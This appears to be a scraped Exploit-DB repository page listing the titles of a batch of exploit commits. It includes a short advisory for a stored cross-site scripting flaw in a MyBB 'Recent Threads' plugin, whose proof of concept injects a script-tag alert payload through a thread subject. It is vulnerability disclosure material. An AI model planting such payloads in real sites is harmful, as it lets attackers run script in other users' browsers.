c91cad5a90
19 changes to exploits/shellcodes WebKit - WebAssembly Parsing Does not Correctly Check Section Order CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure H2 Database - 'Alias' Arbitrary Code Execution GoldWave 5.70 - Local Buffer Overflow (SEH Unicode) PMS 0.42 - Local Stack-Based Overflow (ROP) Unitrends UEB 10.0 - Unauthenticated Root Remote Code Execution WolfCMS 0.8.3.1 - Cross Site Request Forgery Cobub Razor 0.7.2 - Add New Superuser Account MyBB Plugin Recent Threads On Index - Cross-Site Scripting WolfCMS 0.8.3.1 - Open Redirection Yahei PHP Prober 0.4.7 - Cross-Site Scripting WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution iScripts SonicBB 1.0 - Reflected Cross-Site Scripting WordPress Plugin Google Drive 2.2 - Remote Code Execution
16 lines
No EOL
488 B
Text
16 lines
No EOL
488 B
Text
# Exploit Title: MyBB Recent threads
|
|
# Date: 4th April 2018
|
|
# Exploit Author: Perileos
|
|
# Software Link: https://community.mybb.com/mods.php?action=view&pid=191
|
|
# Version: 17.0
|
|
# Tested on: Windows 10
|
|
|
|
1. Description:
|
|
This plugin shows recent threads in the side bar on your MyBB forum.
|
|
|
|
2. Proof of concept:
|
|
|
|
Persistent XSS
|
|
- Create a thread with the following subject <p
|
|
"""><SCRIPT>alert("XSS")</SCRIPT>">
|
|
- Navigate to the index to see a board wide persistent XSS alert. |